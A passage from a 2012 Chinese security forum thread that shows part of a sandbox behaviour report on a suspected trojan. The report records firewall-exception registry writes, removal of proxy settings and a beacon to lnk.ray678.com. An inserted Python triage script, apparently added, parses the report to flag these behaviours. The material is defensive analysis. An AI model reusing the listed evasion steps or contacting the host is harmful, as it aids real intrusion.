netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\ControlFlags [0x1]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier\Guid ["b0278a28-76f1-4e15-b1df-14b209a12613"]
netsh.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier\BitNames [" Error Unusual Info Debug"]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [58 04 75 F3 E1 6F ED 90 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [ED 26 31 42 D4 66 B0 D1 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [27 DF 32 50 EB 91 D0 C9 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [8B 30 DB 05 AB 01 9C 16 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [6F B2 DF 64 50 AB FC 5E ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [1B 7E CC EB 84 0A 72 34 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [81 D2 35 18 F0 D0 99 75 ...]
wmiprvse.exe --> \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\Seed [E1 E0 B9 DF F5 FF 42 7E ...]
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\RealAudo\Ac97\GooglePinying.exe ["C:\Program Files\RealAudo\Ac97\GooglePinying.exe:*:Enabled:StacSV"]
svchost.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch [0x7A]

Delete value key:
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
svchost.exe --> \REGISTRY\USER\S-1-5-21-1177238915-1647877149-2147093213-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
wmiprvse.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PerfOS\Performance\Error Count

Download file:
Get lnk.ray678.com:8664
/lltj/cfg1FileServlet?g=5d28beaea0fd951cd3ebd72549215a9a&m=5d28beaea0fd951cd3ebd72549215a9a&p1=data01&p2=P2LOST&p3=P3LOST&ver=1.0.2.1&now=2012-06-20%2013:46:35&s=7fba36a4106a19dd555199d4e6c4c559

Try to connect domain:
lnk.ray678.com
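To make the case in the report above concrete from the defender's side, here is an added Python triage script (not from the thread, and not the sandbox's own tooling) that parses the report's "Section:" / "actor --> target" layout and returns the behaviours a reviewer would cite against a false-positive claim. The embedded excerpt is constructed from the paths and host shown in that report, and the five rules are this example's own assumptions, not the sandbox's scoring.

```python
import re
from collections import defaultdict

# Constructed excerpt in the layout of the sandbox report quoted in the thread.
SAMPLE_REPORT = r"""
Create process:
sample.exe --> C:\Program Files\RealAudo\Ac97\GooglePinying.exe
sample.exe --> C:\WINDOWS\system32\cmd.exe
GooglePinying.e --> C:\WINDOWS\system32\ipconfig.exe
GooglePinying.e --> C:\WINDOWS\system32\netsh.exe
GooglePinying.e --> C:\WINDOWS\system32\net.exe
GooglePinying.e --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfg490~tmp\_RND_0.tmp\xqcqpj.tmp
xqcqpj.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cdg491~tmp\_RND_1.tmp\xhuupc.tmp
xhuupc.tmp --> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gfz492~tmp\_RND_2.tmp\xhuupc.tmp
xhuupc.tmp --> C:\WINDOWS\system32\svchost.exe
Delete file:
cmd.exe --> C:\sample.exe
Set value key:
netsh.exe --> \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\RealAudo\Ac97\GooglePinying.exe ["C:\Program Files\RealAudo\Ac97\GooglePinying.exe:*:Enabled:StacSV"]
Download file:
Get lnk.ray678.com:8664
/lltj/cfg1FileServlet?g=5d28beaea0fd951cd3ebd72549215a9a&p1=data01
Try to connect domain:
lnk.ray678.com
"""

SECTION_RE = re.compile(r"^[A-Za-z ]+:$")
EDGE_RE = re.compile(r"^(\S+) --> (.+)$")
RECON_TOOLS = {"ipconfig.exe", "netsh.exe", "net.exe", "net1.exe"}

def parse_report(text):
    """Map each 'Section:' header to (actor, target) pairs; arrow-less lines keep actor=None."""
    sections, current = defaultdict(list), "preamble"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("====="):
            continue
        if SECTION_RE.match(line):
            current = line[:-1]
            continue
        m = EDGE_RE.match(line)
        sections[current].append((m.group(1), m.group(2)) if m else (None, line))
    return sections

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(sections):
    """Turn the parsed behaviour into the reasons a defender would cite."""
    findings, procs = [], sections.get("Create process", [])
    # 1. A dropped binary driving the built-in network/recon tools.
    children = defaultdict(set)
    for actor, target in procs:
        children[actor].add(basename(target))
    for actor, names in children.items():
        tools = sorted(names & RECON_TOOLS)
        if tools:
            findings.append(f"{actor} spawns network/recon tools: {', '.join(tools)}")
    # 2. Hops through randomly named %Temp%\*.tmp executables that end in svchost.exe.
    hops = [t for _, t in procs if "\\Temp\\" in t and t.lower().endswith(".tmp")]
    if hops and any(basename(t) == "svchost.exe" for _, t in procs):
        findings.append(f"{len(hops)} temp-file hops before svchost.exe is launched")
    # 3. The original sample is removed by cmd.exe (anti-forensics).
    for actor, target in sections.get("Delete file", []):
        if actor and basename(actor) == "cmd.exe" and basename(target) == "sample.exe":
            findings.append("sample deletes itself via cmd.exe")
    # 4. netsh writes a Windows Firewall exception for the dropped executable.
    for actor, target in sections.get("Set value key", []):
        if "\\FirewallPolicy\\" in target and "AuthorizedApplications" in target:
            exe = basename(target.split(" [")[0])
            findings.append(f"{actor} adds a firewall exception for {exe}")
    # 5. Beaconing over HTTP to a non-standard port.
    for _, line in sections.get("Download file", []):
        m = re.match(r"Get ([\w.-]+):(\d+)$", line)
        if m and m.group(2) not in ("80", "443"):
            findings.append(f"HTTP GET to {m.group(1)} on non-standard port {m.group(2)}")
    return findings

def contacted_hosts(sections):
    return sorted(h for _, h in sections.get("Try to connect domain", []))
```

Run `triage(parse_report(SAMPLE_REPORT))` to get the five findings; `contacted_hosts` returns the domains to hunt for in proxy and DNS logs.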
cfans
Posted on 2012-6-20 14:01:27
jayavira posted on 2012-6-20 13:52
...

What did you use to analyse this?
cfans
Posted on 2012-6-20 14:03:27
/tiao眼镜鱼 posted on 2012-6-20 13:45
You have a 火眼 invitation code?? How did you get it???

Take part in an event in the 山山论坛 attack-and-defence section and you get an invitation code for free.

There was one just yesterday.
jayavira
Posted on 2012-6-20 14:21:14
cfans posted on 2012-6-20 14:01
What did you use to analyse this?

An online sandbox.
wuyongliang
Posted on 2012-6-20 16:02:46
Last edited by wuyongliang on 2012-6-20 16:04
cfans posted on 2012-6-20 13:20
Please look at the file before you speak; don't jump to conclusions.

Oh, let me take a look at the download; neither FS nor A2 flagged it.
Copyright © KaFan  KaFan.cn All Rights Reserved.